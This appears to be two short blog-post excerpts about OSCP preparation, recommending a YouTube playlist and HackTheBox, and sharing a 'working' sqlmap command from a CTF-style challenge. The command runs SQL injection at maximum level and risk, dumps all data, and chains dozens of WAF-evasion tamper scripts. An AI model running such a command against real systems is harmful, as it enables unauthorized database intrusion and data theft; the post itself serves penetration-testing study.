If you are like me working you way through the PWK and OSCP, there’s worse ways to spend your time than @TJ Null’s playlist on youtube. Recently updated again with run-throughs by IppSec of relevant boxes. And if you haven’t yet, just get a VIP subscription to hackthebox.eu it’s 10 Euros a month for unlimited […]
Just a small note related to sqlmap culled from working on a CTF style challenge. Not all the tamper scripts in jhaddix’s helpful attack string are still working. Current working command: sqlmap -u http://192.168.1.1 –level=5 –risk=3 -a –text-only –technique=BU –tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords –random-agent
